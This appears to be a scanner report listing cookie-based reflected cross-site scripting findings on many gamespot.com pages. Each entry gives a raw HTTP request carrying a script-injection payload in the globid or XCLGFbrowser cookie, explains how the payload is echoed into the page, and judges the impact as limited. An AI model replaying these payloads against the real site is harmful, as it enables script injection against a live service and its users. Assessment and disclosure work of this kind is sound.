GET /downloads/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw8cd02"><script>alert(1)</script>5b85a4ed3a7; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a9c0"><script>alert(1)</script>3c7da746a3f was submitted in the globid cookie. This input was echoed as 4a9c0\"><script>alert(1)</script>3c7da746a3f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /downloads/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX4a9c0"><script>alert(1)</script>3c7da746a3f; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 885ff"><script>alert(1)</script>7df7c28818b was submitted in the XCLGFbrowser cookie. This input was echoed as 885ff\"><script>alert(1)</script>7df7c28818b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ds/action/supermariobrosds/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw885ff"><script>alert(1)</script>7df7c28818b; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8449"><script>alert(1)</script>ecd8da2471d was submitted in the globid cookie. This input was echoed as f8449\"><script>alert(1)</script>ecd8da2471d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ds/action/supermariobrosds/hints.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXf8449"><script>alert(1)</script>ecd8da2471d; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f87d9"><script>alert(1)</script>a37dc880882 was submitted in the XCLGFbrowser cookie. This input was echoed as f87d9\"><script>alert(1)</script>a37dc880882 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ds/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwf87d9"><script>alert(1)</script>a37dc880882; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 894be"><script>alert(1)</script>a32a3fea5f1 was submitted in the globid cookie. This input was echoed as 894be\"><script>alert(1)</script>a32a3fea5f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /ds/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX894be"><script>alert(1)</script>a32a3fea5f1; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80888"><script>alert(1)</script>01a455adcd1 was submitted in the XCLGFbrowser cookie. This input was echoed as 80888\"><script>alert(1)</script>01a455adcd1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /features/6257476/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw80888"><script>alert(1)</script>01a455adcd1; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54e1d"><script>alert(1)</script>a3d65fa9e7 was submitted in the globid cookie. This input was echoed as 54e1d\"><script>alert(1)</script>a3d65fa9e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /features/6257476/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX54e1d"><script>alert(1)</script>a3d65fa9e7; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8b58"><script>alert(1)</script>752d7ad0b6e was submitted in the XCLGFbrowser cookie. This input was echoed as f8b58\"><script>alert(1)</script>752d7ad0b6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /features/6285489/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwf8b58"><script>alert(1)</script>752d7ad0b6e; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f46b9"><script>alert(1)</script>caea154c704 was submitted in the globid cookie. This input was echoed as f46b9\"><script>alert(1)</script>caea154c704 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /features/6285489/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXf46b9"><script>alert(1)</script>caea154c704; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3526c"><script>alert(1)</script>81d741c99fb was submitted in the XCLGFbrowser cookie. This input was echoed as 3526c\"><script>alert(1)</script>81d741c99fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forums/fav_boards.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw3526c"><script>alert(1)</script>81d741c99fb; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f52"><script>alert(1)</script>6c69311d147 was submitted in the globid cookie. This input was echoed as 82f52\"><script>alert(1)</script>6c69311d147 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forums/fav_boards.php HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX82f52"><script>alert(1)</script>6c69311d147; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79aa0"><script>alert(1)</script>a46163c3bcb was submitted in the XCLGFbrowser cookie. This input was echoed as 79aa0\"><script>alert(1)</script>a46163c3bcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forums/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw79aa0"><script>alert(1)</script>a46163c3bcb; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d220"><script>alert(1)</script>0d66f7c73bf was submitted in the globid cookie. This input was echoed as 7d220\"><script>alert(1)</script>0d66f7c73bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /forums/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX7d220"><script>alert(1)</script>0d66f7c73bf; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cad4"><script>alert(1)</script>fd445736837 was submitted in the XCLGFbrowser cookie. This input was echoed as 8cad4\"><script>alert(1)</script>fd445736837 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /games.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw8cad4"><script>alert(1)</script>fd445736837; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea655"><script>alert(1)</script>827f0d332ba was submitted in the globid cookie. This input was echoed as ea655\"><script>alert(1)</script>827f0d332ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /games.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXea655"><script>alert(1)</script>827f0d332ba; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 109e4"><script>alert(1)</script>2a05b0a29c6 was submitted in the XCLGFbrowser cookie. This input was echoed as 109e4\"><script>alert(1)</script>2a05b0a29c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /iphone/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw109e4"><script>alert(1)</script>2a05b0a29c6; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b73f6"><script>alert(1)</script>dd34ab0d31a was submitted in the globid cookie. This input was echoed as b73f6\"><script>alert(1)</script>dd34ab0d31a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /iphone/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXb73f6"><script>alert(1)</script>dd34ab0d31a; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0a04"><script>alert(1)</script>383b7fa2b9e was submitted in the XCLGFbrowser cookie. This input was echoed as e0a04\"><script>alert(1)</script>383b7fa2b9e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /misc/aboutus.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCwe0a04"><script>alert(1)</script>383b7fa2b9e; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4004"><script>alert(1)</script>a2833b0305d was submitted in the globid cookie. This input was echoed as f4004\"><script>alert(1)</script>a2833b0305d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /misc/aboutus.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHXf4004"><script>alert(1)</script>a2833b0305d; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ecf3"><script>alert(1)</script>8d75d59d23c was submitted in the XCLGFbrowser cookie. This input was echoed as 5ecf3\"><script>alert(1)</script>8d75d59d23c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /misc/helpcenter.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw5ecf3"><script>alert(1)</script>8d75d59d23c; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19b21"><script>alert(1)</script>ee29ba94127 was submitted in the globid cookie. This input was echoed as 19b21\"><script>alert(1)</script>ee29ba94127 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /misc/helpcenter.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX19b21"><script>alert(1)</script>ee29ba94127; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the XCLGFbrowser cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 563d1"><script>alert(1)</script>c24277904ff was submitted in the XCLGFbrowser cookie. This input was echoed as 563d1\"><script>alert(1)</script>c24277904ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /misc/rss/index.html HTTP/1.1 Host: www.gamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw563d1"><script>alert(1)</script>c24277904ff; geolocn=MTc0LjEyMS4yMjIuMTg6ODQwOjYxOA%3D%3D; MADTEST=1; hello_from_gs=1; ctk=NGQxZjk0ZjhhZTc5ZGUxMjEyYjIxYWI3ZjQyZg%3D%3D; mad_rsi_segs=; globid=1.17/UmruvRN6MnTHX; gspot_side_010111=1; post_clc_title=Forum+-+Sony+PlayStation+3+-+How+do+you+erase+playstation+3+online+accounts%3F;
The value of the globid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eb19"><script>alert(1)</script>e2ab97fd18c was submitted in the globid cookie. This input was echoed as 1eb19\"><script>alert(1)</script>e2ab97fd18c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
